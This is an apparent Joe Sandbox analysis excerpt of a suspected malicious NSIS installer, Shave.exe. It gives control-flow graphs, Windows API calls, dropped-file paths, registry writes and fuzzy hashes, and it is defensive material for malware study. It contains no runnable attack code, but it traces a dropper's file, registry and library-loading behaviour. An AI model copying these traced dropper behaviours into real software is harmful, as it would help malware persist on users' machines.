                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                • API String ID: 717251189-1230650788
                                                                                                                                • Opcode ID: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
                                                                                                                                • Instruction ID: 404aa91c63c37ecb41bc9170075bd2a6d7acde9a16fb3e5716bfaea1f71b207e
                                                                                                                                • Opcode Fuzzy Hash: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
                                                                                                                                • Instruction Fuzzy Hash: C0613671A00511ABDF209F24DD40ABE37A5AF45314F12813FE943BA2D0EB3C99A1CB5D

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 846 40176f-401794 call 402c41 call 405be3 851 401796-40179c call 406297 846->851 852 40179e-4017b0 call 406297 call 405b6c lstrcatW 846->852 858 4017b5-4017b6 call 40652b 851->858 852->858 861 4017bb-4017bf 858->861 862 4017c1-4017cb call 4065da 861->862 863 4017f2-4017f5 861->863 871 4017dd-4017ef 862->871 872 4017cd-4017db CompareFileTime 862->872 865 4017f7-4017f8 call 405d68 863->865 866 4017fd-401819 call 405d8d 863->866 865->866 873 40181b-40181e 866->873 874 40188d-4018b6 call 4052ff call 403116 866->874 871->863 872->871 875 401820-40185e call 406297 * 2 call 4062b9 call 406297 call 4058fd 873->875 876 40186f-401879 call 4052ff 873->876 888 4018b8-4018bc 874->888 889 4018be-4018ca SetFileTime 874->889 875->861 909 401864-401865 875->909 886 401882-401888 876->886 890 402ace 886->890 888->889 892 4018d0-4018db CloseHandle 888->892 889->892 894 402ad0-402ad4 890->894 895 4018e1-4018e4 892->895 896 402ac5-402ac8 892->896 898 4018e6-4018f7 call 4062b9 lstrcatW 895->898 899 4018f9-4018fc call 4062b9 895->899 896->890 904 401901-4022fc call 4058fd 898->904 899->904 904->894 909->886 911 401867-401868 909->911 911->876
                                                                                                                                APIs
                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne,?,?,00000031), ref: 004017B0
                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne,?,?,00000031), ref: 004017D5
                                                                                                                                  • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                                                                                  • Part of subcall function 004052FF: lstrlenW.KERNEL32(007A0F00,00000000,007924D8,759223A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                                                                                                                  • Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,007A0F00,00000000,007924D8,759223A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                                                                                                                  • Part of subcall function 004052FF: lstrcatW.KERNEL32(007A0F00,00403257,00403257,007A0F00,00000000,007924D8,759223A0), ref: 0040535A
                                                                                                                                  • Part of subcall function 004052FF: SetWindowTextW.USER32(007A0F00,007A0F00), ref: 0040536C
                                                                                                                                  • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                                                                                  • Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                                                                                  • Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne$C:\Users\user\AppData\Local\Temp\nsa5D43.tmp$C:\Users\user\AppData\Local\Temp\nsa5D43.tmp\System.dll$Call
                                                                                                                                • API String ID: 1941528284-3125287026
                                                                                                                                • Opcode ID: 1aff087000cc3e25554f0ed6ab8061021059107db776a0829eeff450dd20a923
                                                                                                                                • Instruction ID: 2a95d3c8b727dc51f4ea131d05094547f585338353aa12d45a2270be549af1c7
                                                                                                                                • Opcode Fuzzy Hash: 1aff087000cc3e25554f0ed6ab8061021059107db776a0829eeff450dd20a923
                                                                                                                                • Instruction Fuzzy Hash: C141B471910514BACF107BA5DD45DAF3A79EF45328B20823FF512B10E1DB3C4A519B6E

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 912 406601-406621 GetSystemDirectoryW 913 406623 912->913 914 406625-406627 912->914 913->914 915 406638-40663a 914->915 916 406629-406632 914->916 918 40663b-40666e wsprintfW LoadLibraryExW 915->918 916->915 917 406634-406636 916->917 917->918
                                                                                                                                APIs
                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
                                                                                                                                • wsprintfW.USER32 ref: 00406653
                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                • API String ID: 2200240437-1946221925
                                                                                                                                • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                • Instruction ID: 65f2176863960af248fb2a7cbd18121a9a3b282edca47cb762b3bdaa43f9a997
                                                                                                                                • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                • Instruction Fuzzy Hash: 14F0217050121967CB10AB68DD0DFDB376CA700304F10447AB547F10D1EBBDDA65CB98

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 919 403116-40312d 920 403136-40313f 919->920 921 40312f 919->921 922 403141 920->922 923 403148-40314d 920->923 921->920 922->923 924 40315d-40316a call 40330e 923->924 925 40314f-403158 call 403324 923->925 929 403170-403174 924->929 930 4032fc 924->930 925->924 931 4032a7-4032a9 929->931 932 40317a-4031a0 GetTickCount 929->932 933 4032fe-4032ff 930->933 934 4032e9-4032ec 931->934 935 4032ab-4032ae 931->935 936 403304 932->936 937 4031a6-4031ae 932->937 938 403307-40330b 933->938 939 4032f1-4032fa call 40330e 934->939 940 4032ee 934->940 935->936 941 4032b0 935->941 936->938 942 4031b0 937->942 943 4031b3-4031c1 call 40330e 937->943 939->930 951 403301 939->951 940->939 945 4032b3-4032b9 941->945 942->943 943->930 953 4031c7-4031d0 943->953 948 4032bb 945->948 949 4032bd-4032cb call 40330e 945->949 948->949 949->930 957 4032cd-4032d9 call 405e3f 949->957 951->936 955 4031d6-4031f6 call 4067d2 953->955 960 4031fc-40320f GetTickCount 955->960 961 40329f-4032a1 955->961 963 4032a3-4032a5 957->963 964 4032db-4032e5 957->964 965 403211-403219 960->965 966 40325a-40325c 960->966 961->933 963->933 964->945 967 4032e7 964->967 968 403221-403257 MulDiv wsprintfW call 4052ff 965->968 969 40321b-40321f 965->969 970 403293-403297 966->970 971 40325e-403262 966->971 967->936 968->966 969->966 969->968 970->937 972 40329d 970->972 974 403264-40326b call 405e3f 971->974 975 403279-403284 971->975 972->936 980 403270-403272 974->980 978 403287-40328b 975->978 978->955 979 403291 978->979 979->936 980->963 981 403274-403277 980->981 981->978
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CountTick$wsprintf
                                                                                                                                • String ID: ... %d%%
                                                                                                                                • API String ID: 551687249-2449383134
                                                                                                                                • Opcode ID: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
                                                                                                                                • Instruction ID: 204c6f4639eb8c290f7f343d6ac391169eef919077521cdf394e4ce58078bb87
                                                                                                                                • Opcode Fuzzy Hash: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
                                                                                                                                • Instruction Fuzzy Hash: 7A518931900219EBCB10DF65DA84A9F7FA8AB44366F1441BBED14B62C0D7789F50CBA9

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 982 4057ce-405819 CreateDirectoryW 983 40581b-40581d 982->983 984 40581f-40582c GetLastError 982->984 985 405846-405848 983->985 984->985 986 40582e-405842 SetFileSecurityW 984->986 986->983 987 405844 GetLastError 986->987 987->985
                                                                                                                                APIs
                                                                                                                                • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405811
                                                                                                                                • GetLastError.KERNEL32 ref: 00405825
                                                                                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040583A
                                                                                                                                • GetLastError.KERNEL32 ref: 00405844
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                                                • API String ID: 3449924974-1246513382
                                                                                                                                • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                                                                • Instruction ID: 32cc50e607dd20b61f2ed470817bc290d965520901a5db6b5155953f1fdd03ed
                                                                                                                                • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                                                                • Instruction Fuzzy Hash: B1010872C10619DADF00AFA1C9447EFBBB8EF14355F00803AD945B6281E77896188FA9

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 988 405dbc-405dc8 989 405dc9-405dfd GetTickCount GetTempFileNameW 988->989 990 405e0c-405e0e 989->990 991 405dff-405e01 989->991 993 405e06-405e09 990->993 991->989 992 405e03 991->992 992->993
                                                                                                                                APIs
                                                                                                                                • GetTickCount.KERNEL32 ref: 00405DDA
                                                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Shave.exe",0040336A,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004035B6), ref: 00405DF5
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                • String ID: "C:\Users\user\Desktop\Shave.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                • API String ID: 1716503409-1393458418
                                                                                                                                • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                • Instruction ID: 33897e7ea40e9bcc5f45ceb9d35bf1368e2cdd1c67b8b6f6c5069f2428d8a25f
                                                                                                                                • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                • Instruction Fuzzy Hash: D4F03076610304FBEB009F69DD05F9FBBB8EB95710F10803AED40E7250E6B1AA54CBA4

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 994 6f97177b-6f9717ba call 6f971b63 998 6f9717c0-6f9717c4 994->998 999 6f9718da-6f9718dc 994->999 1000 6f9717c6-6f9717cc call 6f972356 998->1000 1001 6f9717cd-6f9717da call 6f972398 998->1001 1000->1001 1006 6f9717dc-6f9717e1 1001->1006 1007 6f97180a-6f971811 1001->1007 1010 6f9717e3-6f9717e4 1006->1010 1011 6f9717fc-6f9717ff 1006->1011 1008 6f971813-6f97182f call 6f97256d call 6f9715b4 call 6f971272 GlobalFree 1007->1008 1009 6f971831-6f971835 1007->1009 1033 6f971889-6f97188d 1008->1033 1016 6f971837-6f971880 call 6f9715c6 call 6f97256d 1009->1016 1017 6f971882-6f971888 call 6f97256d 1009->1017 1014 6f9717e6-6f9717e7 1010->1014 1015 6f9717ec-6f9717ed call 6f972a74 1010->1015 1011->1007 1012 6f971801-6f971802 call 6f972d2f 1011->1012 1026 6f971807 1012->1026 1021 6f9717f4-6f9717fa call 6f972728 1014->1021 1022 6f9717e9-6f9717ea 1014->1022 1029 6f9717f2 1015->1029 1016->1033 1017->1033 1032 6f971809 1021->1032 1022->1007 1022->1015 1026->1032 1029->1026 1032->1007 1037 6f97188f-6f97189d call 6f972530 1033->1037 1038 6f9718ca-6f9718d1 1033->1038 1044 6f9718b5-6f9718bc 1037->1044 1045 6f97189f-6f9718a2 1037->1045 1038->999 1040 6f9718d3-6f9718d4 GlobalFree 1038->1040 1040->999 1044->1038 1047 6f9718be-6f9718c9 call 6f97153d 1044->1047 1045->1044 1046 6f9718a4-6f9718ac 1045->1046 1046->1044 1048 6f9718ae-6f9718af FreeLibrary 1046->1048 1047->1038 1048->1044
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 6F971B63: GlobalFree.KERNEL32(?), ref: 6F971DB6
                                                                                                                                  • Part of subcall function 6F971B63: GlobalFree.KERNEL32(?), ref: 6F971DBB
                                                                                                                                  • Part of subcall function 6F971B63: GlobalFree.KERNEL32(?), ref: 6F971DC0
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6F971829
                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 6F9718AF
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6F9718D4
                                                                                                                                  • Part of subcall function 6F972356: GlobalAlloc.KERNEL32(00000040,?), ref: 6F972387
                                                                                                                                  • Part of subcall function 6F972728: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6F9717FA,00000000), ref: 6F9727F8
                                                                                                                                  • Part of subcall function 6F9715C6: lstrcpyW.KERNEL32(?,6F974020,00000000,6F9715C3,?,00000000,6F971753,00000000), ref: 6F9715DC
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2386745512.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2386728456.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2386788272.000000006F973000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2386807263.000000006F975000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_6f970000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1791698881-3916222277
                                                                                                                                • Opcode ID: ff8049d681f18227f17e75359568fca9300cb05573f3c84091fbf22aff7a9dc4
                                                                                                                                • Instruction ID: 8cffa029382c8b981e21115a883d925e08adb8a9fa88be85353ba627df19ce3d
                                                                                                                                • Opcode Fuzzy Hash: ff8049d681f18227f17e75359568fca9300cb05573f3c84091fbf22aff7a9dc4
                                                                                                                                • Instruction Fuzzy Hash: 96418B71404304DBDB389F3498A4BD677ACBB17724F044566E95A9E1C7DFB8E0C48B60

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1051 4023e4-402415 call 402c41 * 2 call 402cd1 1058 402ac5-402ad4 1051->1058 1059 40241b-402425 1051->1059 1061 402427-402434 call 402c41 lstrlenW 1059->1061 1062 402438-40243b 1059->1062 1061->1062 1063 40243d-40244e call 402c1f 1062->1063 1064 40244f-402452 1062->1064 1063->1064 1068 402463-402477 RegSetValueExW 1064->1068 1069 402454-40245e call 403116 1064->1069 1073 402479 1068->1073 1074 40247c-40255d RegCloseKey 1068->1074 1069->1068 1073->1074 1074->1058 1076 40288b-402892 1074->1076 1076->1058
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 0040242F
                                                                                                                                • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 0040246F
                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseValuelstrlen
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsa5D43.tmp
                                                                                                                                • API String ID: 2655323295-1113152414
                                                                                                                                • Opcode ID: e4c63a464812e31c68653a2d561002cfdcec3cddba2e48d4c9e2fa9e1af61684
                                                                                                                                • Instruction ID: 82080937d165882f0efaaa77ae0bb3c7350c3cd8b3028382441b60bd8f3f090b
                                                                                                                                • Opcode Fuzzy Hash: e4c63a464812e31c68653a2d561002cfdcec3cddba2e48d4c9e2fa9e1af61684
                                                                                                                                • Instruction Fuzzy Hash: 60118171D00104BEEF10AFA5DE89EAEBAB4EB44754F11803BF504B71D1DBB88D419B28
                                                                                                                                APIs
